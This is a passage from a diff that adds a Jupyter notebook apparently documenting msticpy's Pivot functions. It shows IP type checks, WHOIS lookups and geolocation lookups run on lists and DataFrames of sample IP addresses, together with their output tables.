+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "ip1 = IpAddress(Address=\"10.1.1.1\")\n",
+    "ip2 = IpAddress(Address=\"157.53.1.1\")\n",
+    "\n",
+    "display(IpAddress.util.ip_type(ip1))\n",
+    "display(IpAddress.util.ip_type(ip2))\n",
+    "display(IpAddress.util.whois(ip2))\n",
+    "display(IpAddress.util.geoloc(ip2))"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Using a list (or other iterable) as a parameter\n",
+    "\n",
+    "Many of the underlying functions will accept either single values or collections \n",
+    "(usually in DataFrames) of values as input.\n",
+    "Even in cases where the underlying function does not accept iterables as parameters, the\n",
+    "Pivot library will usually be able to iterate through each value and collate the results\n",
+    "to hand you back a single dataframe.\n",
+    "\n",
+    "> Note: there are some exceptions to this - usually where the underlying function<br>\n",
+    "> is long-running or expensive and has opted not to accept iterated calls.<br>\n",
+    "> Notebooklets are an example of these.<br>\n",
+    "\n",
+    "Where the function has multiple parameters you can supply a mixture of iterables and single values.\n",
+    "\n",
+    "- In this case, the single-valued parameters are re-used on each call, paired with the item\n",
+    "  in the list(s) taken from the multi-valued parameters\n",
+    "  \n",
+    "You can also use multiple iterables for multiple parameters.\n",
+    "- In this case the iterables *should* be the same length. \n",
+    "  If they are different lengths the iterations stop after the shorted list/iterable is exhausted.\n",
+    "  \n",
+    "For example:\n",
+    "```\n",
+    "  list_1 = [1, 2, 3, 4]\n",
+    "  list_2 = [\"a\", \"b\", \"c\"]\n",
+    "  entity.util.func(p1=list_1, p2=list_2)\n",
+    "```\n",
+    "\n",
+    "The function will execute with the pairings (1, \"a\"), (2, \"b\") and (3, \"c) - (4, \\_) will be ignored"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 15,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<p style=''>Use our magic function to convert pasted-in list to dataframe</p>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "from msticpy.datamodel import txt_df_magic\n",
+    "md(\"Use our magic function to convert pasted-in list to dataframe\")"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 16,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>AllExtIPs</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>9</th>\n",
+       "      <td>172.217.15.99</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>10</th>\n",
+       "      <td>40.85.232.64</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>11</th>\n",
+       "      <td>20.38.98.100</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>12</th>\n",
+       "      <td>23.96.64.84</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>13</th>\n",
+       "      <td>65.55.44.108</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>14</th>\n",
+       "      <td>131.107.147.209</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>15</th>\n",
+       "      <td>10.0.3.4</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>16</th>\n",
+       "      <td>10.0.3.5</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>17</th>\n",
+       "      <td>13.82.152.48</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "          AllExtIPs\n",
+       "9     172.217.15.99\n",
+       "10     40.85.232.64\n",
+       "11     20.38.98.100\n",
+       "12      23.96.64.84\n",
+       "13     65.55.44.108\n",
+       "14  131.107.147.209\n",
+       "15         10.0.3.4\n",
+       "16         10.0.3.5\n",
+       "17     13.82.152.48"
+      ]
+     },
+     "execution_count": 16,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "%%txt2df --headers --name ip_df1\n",
+    "AllExtIPs\n",
+    "9, 172.217.15.99\n",
+    "10, 40.85.232.64\n",
+    "11, 20.38.98.100\n",
+    "12, 23.96.64.84\n",
+    "13, 65.55.44.108\n",
+    "14, 131.107.147.209\n",
+    "15, 10.0.3.4\n",
+    "16, 10.0.3.5\n",
+    "17, 13.82.152.48"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 17,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>ip</th>\n",
+       "      <th>result</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>23.96.64.84</td>\n",
+       "      <td>Public</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>65.55.44.108</td>\n",
+       "      <td>Public</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>131.107.147.209</td>\n",
+       "      <td>Public</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>3</th>\n",
+       "      <td>10.0.3.4</td>\n",
+       "      <td>Private</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>4</th>\n",
+       "      <td>10.0.3.5</td>\n",
+       "      <td>Private</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>5</th>\n",
+       "      <td>13.82.152.48</td>\n",
+       "      <td>Public</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "                ip   result\n",
+       "0      23.96.64.84   Public\n",
+       "1     65.55.44.108   Public\n",
+       "2  131.107.147.209   Public\n",
+       "3         10.0.3.4  Private\n",
+       "4         10.0.3.5  Private\n",
+       "5     13.82.152.48   Public"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>ip</th>\n",
+       "      <th>result</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>23.96.64.84</td>\n",
+       "      <td>Public</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>65.55.44.108</td>\n",
+       "      <td>Public</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>131.107.147.209</td>\n",
+       "      <td>Public</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>3</th>\n",
+       "      <td>10.0.3.4</td>\n",
+       "      <td>Private</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>4</th>\n",
+       "      <td>10.0.3.5</td>\n",
+       "      <td>Private</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>5</th>\n",
+       "      <td>13.82.152.48</td>\n",
+       "      <td>Public</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "                ip   result\n",
+       "0      23.96.64.84   Public\n",
+       "1     65.55.44.108   Public\n",
+       "2  131.107.147.209   Public\n",
+       "3         10.0.3.4  Private\n",
+       "4         10.0.3.5  Private\n",
+       "5     13.82.152.48   Public"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>nir</th>\n",
+       "      <th>asn_registry</th>\n",
+       "      <th>asn</th>\n",
+       "      <th>asn_cidr</th>\n",
+       "      <th>asn_country_code</th>\n",
+       "      <th>asn_date</th>\n",
+       "      <th>asn_description</th>\n",
+       "      <th>query</th>\n",
+       "      <th>nets</th>\n",
+       "      <th>raw</th>\n",
+       "      <th>referral</th>\n",
+       "      <th>raw_referral</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>NaN</td>\n",
+       "      <td>arin</td>\n",
+       "      <td>8075</td>\n",
+       "      <td>23.96.0.0/14</td>\n",
+       "      <td>US</td>\n",
+       "      <td>2013-06-18</td>\n",
+       "      <td>MICROSOFT-CORP-MSN-AS-BLOCK, US</td>\n",
+       "      <td>23.96.64.84</td>\n",
+       "      <td>[{'cidr': '23.96.0.0/13', 'name': 'MSFT', 'handle': 'NET-23-96-0-0-1', 'range': '23.96.0.0 - 23....</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>NaN</td>\n",
+       "      <td>arin</td>\n",
+       "      <td>8075</td>\n",
+       "      <td>65.52.0.0/14</td>\n",
+       "      <td>US</td>\n",
+       "      <td>2001-02-14</td>\n",
+       "      <td>MICROSOFT-CORP-MSN-AS-BLOCK, US</td>\n",
+       "      <td>65.55.44.108</td>\n",
+       "      <td>[{'cidr': '65.52.0.0/14', 'name': 'MICROSOFT-1BLK', 'handle': 'NET-65-52-0-0-1', 'range': '65.52...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>NaN</td>\n",
+       "      <td>arin</td>\n",
+       "      <td>3598</td>\n",
+       "      <td>131.107.0.0/16</td>\n",
+       "      <td>US</td>\n",
+       "      <td>1988-11-11</td>\n",
+       "      <td>MICROSOFT-CORP-AS, US</td>\n",
+       "      <td>131.107.147.209</td>\n",
+       "      <td>[{'cidr': '131.107.0.0/16', 'name': 'MICROSOFT', 'handle': 'NET-131-107-0-0-1', 'range': '131.10...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>3</th>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>4</th>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>5</th>\n",
+       "      <td>NaN</td>\n",
+       "      <td>arin</td>\n",
+       "      <td>8075</td>\n",
+       "      <td>13.64.0.0/11</td>\n",
+       "      <td>US</td>\n",
+       "      <td>2015-03-26</td>\n",
+       "      <td>MICROSOFT-CORP-MSN-AS-BLOCK, US</td>\n",
+       "      <td>13.82.152.48</td>\n",
+       "      <td>[{'cidr': '13.64.0.0/11, 13.104.0.0/14, 13.96.0.0/13', 'name': 'MSFT', 'handle': 'NET-13-64-0-0-...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "   nir asn_registry   asn        asn_cidr asn_country_code    asn_date  \\\n",
+       "0  NaN         arin  8075    23.96.0.0/14               US  2013-06-18   \n",
+       "1  NaN         arin  8075    65.52.0.0/14               US  2001-02-14   \n",
+       "2  NaN         arin  3598  131.107.0.0/16               US  1988-11-11   \n",
+       "3  NaN          NaN   NaN             NaN              NaN         NaN   \n",
+       "4  NaN          NaN   NaN             NaN              NaN         NaN   \n",
+       "5  NaN         arin  8075    13.64.0.0/11               US  2015-03-26   \n",
+       "\n",
+       "                   asn_description            query  \\\n",
+       "0  MICROSOFT-CORP-MSN-AS-BLOCK, US      23.96.64.84   \n",
+       "1  MICROSOFT-CORP-MSN-AS-BLOCK, US     65.55.44.108   \n",
+       "2            MICROSOFT-CORP-AS, US  131.107.147.209   \n",
+       "3                              NaN              NaN   \n",
+       "4                              NaN              NaN   \n",
+       "5  MICROSOFT-CORP-MSN-AS-BLOCK, US     13.82.152.48   \n",
+       "\n",
+       "                                                                                                  nets  \\\n",
+       "0  [{'cidr': '23.96.0.0/13', 'name': 'MSFT', 'handle': 'NET-23-96-0-0-1', 'range': '23.96.0.0 - 23....   \n",
+       "1  [{'cidr': '65.52.0.0/14', 'name': 'MICROSOFT-1BLK', 'handle': 'NET-65-52-0-0-1', 'range': '65.52...   \n",
+       "2  [{'cidr': '131.107.0.0/16', 'name': 'MICROSOFT', 'handle': 'NET-131-107-0-0-1', 'range': '131.10...   \n",
+       "3                                                                                                  NaN   \n",
+       "4                                                                                                  NaN   \n",
+       "5  [{'cidr': '13.64.0.0/11, 13.104.0.0/14, 13.96.0.0/13', 'name': 'MSFT', 'handle': 'NET-13-64-0-0-...   \n",
+       "\n",
+       "   raw  referral  raw_referral  \n",
+       "0  NaN       NaN           NaN  \n",
+       "1  NaN       NaN           NaN  \n",
+       "2  NaN       NaN           NaN  \n",
+       "3  NaN       NaN           NaN  \n",
+       "4  NaN       NaN           NaN  \n",
+       "5  NaN       NaN           NaN  "
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>CountryCode</th>\n",
+       "      <th>CountryName</th>\n",
+       "      <th>State</th>\n",
+       "      <th>City</th>\n",
+       "      <th>Longitude</th>\n",
+       "      <th>Latitude</th>\n",
+       "      <th>Asn</th>\n",
+       "      <th>edges</th>\n",
+       "      <th>Type</th>\n",
+       "      <th>AdditionalData</th>\n",
+       "      <th>IpAddress</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>US</td>\n",
+       "      <td>United States</td>\n",
+       "      <td>Virginia</td>\n",
+       "      <td>Washington</td>\n",
+       "      <td>-78.1539</td>\n",
+       "      <td>38.7095</td>\n",
+       "      <td>None</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>geolocation</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>23.96.64.84</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>US</td>\n",
+       "      <td>United States</td>\n",
+       "      <td>Virginia</td>\n",
+       "      <td>Boydton</td>\n",
+       "      <td>-78.3750</td>\n",
+       "      <td>36.6534</td>\n",
+       "      <td>None</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>geolocation</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>65.55.44.108</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>US</td>\n",
+       "      <td>United States</td>\n",
+       "      <td>Washington</td>\n",
+       "      <td>Redmond</td>\n",
+       "      <td>-122.1257</td>\n",
+       "      <td>47.6722</td>\n",
+       "      <td>None</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>geolocation</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>131.107.147.209</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>3</th>\n",
+       "      <td>US</td>\n",
+       "      <td>United States</td>\n",
+       "      <td>Virginia</td>\n",
+       "      <td>Washington</td>\n",
+       "      <td>-78.1539</td>\n",
+       "      <td>38.7095</td>\n",
+       "      <td>None</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>geolocation</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>13.82.152.48</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "  CountryCode    CountryName       State        City  Longitude  Latitude  \\\n",
+       "0          US  United States    Virginia  Washington   -78.1539   38.7095   \n",
+       "1          US  United States    Virginia     Boydton   -78.3750   36.6534   \n",
+       "2          US  United States  Washington     Redmond  -122.1257   47.6722   \n",
+       "3          US  United States    Virginia  Washington   -78.1539   38.7095   \n",
+       "\n",
+       "    Asn edges         Type AdditionalData        IpAddress  \n",
+       "0  None    {}  geolocation             {}      23.96.64.84  \n",
+       "1  None    {}  geolocation             {}     65.55.44.108  \n",
+       "2  None    {}  geolocation             {}  131.107.147.209  \n",
+       "3  None    {}  geolocation             {}     13.82.152.48  "
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "ip_list1 = ip_df1.AllExtIPs.values[-6:]\n",
+    "\n",
+    "display(IpAddress.util.ip_type(ip_list1))\n",
+    "display(IpAddress.util.ip_type(ip_str=list(ip_list1)))\n",
+    "display(IpAddress.util.whois(value=tuple(ip_list1)))\n",
+    "display(IpAddress.util.geoloc(ip_list1))"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Using DataFrames as input\n",
+    "\n",
+    "Using a dataframe as input requires a slightly different syntax since you not\n",
+    "only need to pass the dataframe as a parameter but also tell the function\n",
+    "which column to use for input.\n",
+    "\n",
+    "To specify the column to use, you can use the name of the parameter that the\n",
+    "underlying function expects or one of these generic names:\n",
+    "\n",
+    "- column\n",
+    "- input_column\n",
+    "- input_col\n",
+    "- src_column\n",
+    "- src_col\n",
+    "\n",
+    "> Note these generic names are not shown in the function help"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 18,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>ip</th>\n",
+       "      <th>result</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>172.217.15.99</td>\n",
+       "      <td>Public</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>40.85.232.64</td>\n",
+       "      <td>Public</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>20.38.98.100</td>\n",
+       "      <td>Public</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>3</th>\n",
+       "      <td>23.96.64.84</td>\n",
+       "      <td>Public</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>4</th>\n",
+       "      <td>65.55.44.108</td>\n",
+       "      <td>Public</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>5</th>\n",
+       "      <td>131.107.147.209</td>\n",
+       "      <td>Public</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>6</th>\n",
+       "      <td>10.0.3.4</td>\n",
+       "      <td>Private</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>7</th>\n",
+       "      <td>10.0.3.5</td>\n",
+       "      <td>Private</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>8</th>\n",
+       "      <td>13.82.152.48</td>\n",
+       "      <td>Public</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "                ip   result\n",
+       "0    172.217.15.99   Public\n",
+       "1     40.85.232.64   Public\n",
+       "2     20.38.98.100   Public\n",
+       "3      23.96.64.84   Public\n",
+       "4     65.55.44.108   Public\n",
+       "5  131.107.147.209   Public\n",
+       "6         10.0.3.4  Private\n",
+       "7         10.0.3.5  Private\n",
+       "8     13.82.152.48   Public"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>ip</th>\n",
+       "      <th>result</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>172.217.15.99</td>\n",
+       "      <td>Public</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>40.85.232.64</td>\n",
+       "      <td>Public</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>20.38.98.100</td>\n",
+       "      <td>Public</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>3</th>\n",
+       "      <td>23.96.64.84</td>\n",
+       "      <td>Public</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>4</th>\n",
+       "      <td>65.55.44.108</td>\n",
+       "      <td>Public</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>5</th>\n",
+       "      <td>131.107.147.209</td>\n",
+       "      <td>Public</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>6</th>\n",
+       "      <td>10.0.3.4</td>\n",
+       "      <td>Private</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>7</th>\n",
+       "      <td>10.0.3.5</td>\n",
+       "      <td>Private</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>8</th>\n",
+       "      <td>13.82.152.48</td>\n",
+       "      <td>Public</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "                ip   result\n",
+       "0    172.217.15.99   Public\n",
+       "1     40.85.232.64   Public\n",
+       "2     20.38.98.100   Public\n",
+       "3      23.96.64.84   Public\n",
+       "4     65.55.44.108   Public\n",
+       "5  131.107.147.209   Public\n",
+       "6         10.0.3.4  Private\n",
+       "7         10.0.3.5  Private\n",
+       "8     13.82.152.48   Public"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>nir</th>\n",
+       "      <th>asn_registry</th>\n",
+       "      <th>asn</th>\n",
+       "      <th>asn_cidr</th>\n",
+       "      <th>asn_country_code</th>\n",
+       "      <th>asn_date</th>\n",
+       "      <th>asn_description</th>\n",
+       "      <th>query</th>\n",
+       "      <th>nets</th>\n",
+       "      <th>raw</th>\n",
+       "      <th>referral</th>\n",
+       "      <th>raw_referral</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>9</th>\n",
+       "      <td>NaN</td>\n",
+       "      <td>arin</td>\n",
+       "      <td>15169</td>\n",
+       "      <td>172.217.15.0/24</td>\n",
+       "      <td>US</td>\n",
+       "      <td>2012-04-16</td>\n",
+       "      <td>GOOGLE, US</td>\n",
+       "      <td>172.217.15.99</td>\n",
+       "      <td>[{'cidr': '172.217.0.0/16', 'name': 'GOOGLE', 'handle': 'NET-172-217-0-0-1', 'range': '172.217.0...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>10</th>\n",
+       "      <td>NaN</td>\n",
+       "      <td>arin</td>\n",
+       "      <td>8075</td>\n",
+       "      <td>40.80.0.0/12</td>\n",
+       "      <td>US</td>\n",
+       "      <td>2015-02-23</td>\n",
+       "      <td>MICROSOFT-CORP-MSN-AS-BLOCK, US</td>\n",
+       "      <td>40.85.232.64</td>\n",
+       "      <td>[{'cidr': '40.120.0.0/14, 40.96.0.0/12, 40.112.0.0/13, 40.124.0.0/16, 40.74.0.0/15, 40.125.0.0/1...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>11</th>\n",
+       "      <td>NaN</td>\n",
+       "      <td>arin</td>\n",
+       "      <td>8075</td>\n",
+       "      <td>20.36.0.0/14</td>\n",
+       "      <td>US</td>\n",
+       "      <td>2017-10-18</td>\n",
+       "      <td>MICROSOFT-CORP-MSN-AS-BLOCK, US</td>\n",
+       "      <td>20.38.98.100</td>\n",
+       "      <td>[{'cidr': '20.34.0.0/15, 20.33.0.0/16, 20.128.0.0/16, 20.36.0.0/14, 20.64.0.0/10, 20.48.0.0/12, ...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>12</th>\n",
+       "      <td>NaN</td>\n",
+       "      <td>arin</td>\n",
+       "      <td>8075</td>\n",
+       "      <td>23.96.0.0/14</td>\n",
+       "      <td>US</td>\n",
+       "      <td>2013-06-18</td>\n",
+       "      <td>MICROSOFT-CORP-MSN-AS-BLOCK, US</td>\n",
+       "      <td>23.96.64.84</td>\n",
+       "      <td>[{'cidr': '23.96.0.0/13', 'name': 'MSFT', 'handle': 'NET-23-96-0-0-1', 'range': '23.96.0.0 - 23....</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>13</th>\n",
+       "      <td>NaN</td>\n",
+       "      <td>arin</td>\n",
+       "      <td>8075</td>\n",
+       "      <td>65.52.0.0/14</td>\n",
+       "      <td>US</td>\n",
+       "      <td>2001-02-14</td>\n",
+       "      <td>MICROSOFT-CORP-MSN-AS-BLOCK, US</td>\n",
